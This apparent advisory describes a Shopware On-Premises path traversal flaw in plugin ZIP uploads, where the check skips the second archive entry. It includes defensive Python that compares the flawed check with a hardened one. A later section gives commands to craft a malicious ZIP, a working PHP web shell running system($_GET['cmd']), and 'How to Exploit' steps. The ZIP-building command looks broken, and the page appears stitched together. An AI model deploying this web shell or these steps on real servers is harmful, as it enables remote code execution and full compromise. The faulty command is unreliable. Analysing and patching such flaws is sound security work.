The vulnerability exists within the plugin upload mechanism of the on-premises Shopware installation. The application attempts to prevent path traversal by scanning entries in an uploaded plugin ZIP file for the forbidden “..” parent directory sequence. However, this security check has a critical flaw: it only starts scanning from the third entry (index 2) in the ZIP archive. The second entry (index 1) is not subjected to this check. An attacker with admin privileges can craft a malicious ZIP file where the second entry uses “../” sequences in its file path. When this ZIP is processed, the file from the unchecked second entry is extracted to an arbitrary location outside the intended `/var/www/html/custom/apps` directory, such as the web root. By placing a PHP web shell there, the attacker gains persistent remote code execution on the server.
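The off-by-one described above, shown as an added example that is not Shopware's own code: a constructed three-entry archive is run through a check that mirrors the described defect (scanning from index 2) and through a hardened check that inspects every entry and resolves each destination against the target directory. The archive, the entry names and the target directory are assumptions; nothing is extracted to disk.

```python
import io
import os
import zipfile


def build_sample_plugin_zip() -> bytes:
    # Constructed sample archive, not a real Shopware plugin. The entry at
    # index 1 carries the parent-directory sequence; entries 0 and 2 are benign.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("MyPlugin/composer.json", "{}")
        zf.writestr("../../public/dropped.php", "placeholder content")
        zf.writestr("MyPlugin/src/MyPlugin.php", "placeholder content")
    return buf.getvalue()


def flawed_check(names):
    # Mirrors the described defect: scanning begins at index 2, so the
    # second entry (index 1) is never inspected.
    return [n for n in names[2:] if ".." in n]


def is_safe_entry(name: str, target_dir: str) -> bool:
    # Reject absolute paths, drive letters and backslashes outright, reject any
    # ".." path segment, then confirm the resolved destination stays inside
    # target_dir (catches cases a plain substring test would miss).
    if not name or name.startswith(("/", "\\")) or "\\" in name or ":" in name:
        return False
    if ".." in name.split("/"):
        return False
    base = os.path.realpath(target_dir)
    dest = os.path.realpath(os.path.join(base, name))
    return os.path.commonpath([base, dest]) == base


def hardened_check(names, target_dir):
    # Every entry is inspected, regardless of its position in the archive.
    return [n for n in names if not is_safe_entry(n, target_dir)]


def compare_checks(zip_bytes: bytes, target_dir: str = "/var/www/html/custom/apps"):
    # Validation only: the archive is listed, never extracted.
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
    return {
        "flawed_flags": flawed_check(names),
        "hardened_flags": hardened_check(names, target_dir),
    }


if __name__ == "__main__":
    print(compare_checks(build_sample_plugin_zip()))
```

The flawed check returns an empty list for the sample archive, while the hardened check flags the traversing entry at index 1.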
Platform: Shopware On-Premises
Version: < 6.3.5.3
Vulnerability: Path Traversal
Severity: Critical
Date: 2020-12-15
Prediction: Patch Available
What Undercode Says:
```
# Create a malicious ZIP file with a second entry that traverses directories
echo "<?php system(\$_GET['cmd']); ?>" > evil.php
zip malicious.zip valid_file.txt
zip malicious.zip "../../../var/www/html/public/evil.php" < evil.php
```

```
// Example of a simple PHP web shell (evil.php)
<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>
```
How to Exploit:
Craft malicious ZIP.
Upload as plugin.
Trigger web shell.
Protection from this CVE
Update to 6.3.5.3.
Implement strict file permissions.
Apply principle of least privilege.
Impact:
Arbitrary File Write
Remote Code Execution
Full System Compromise
Sources:
Reported By: github.com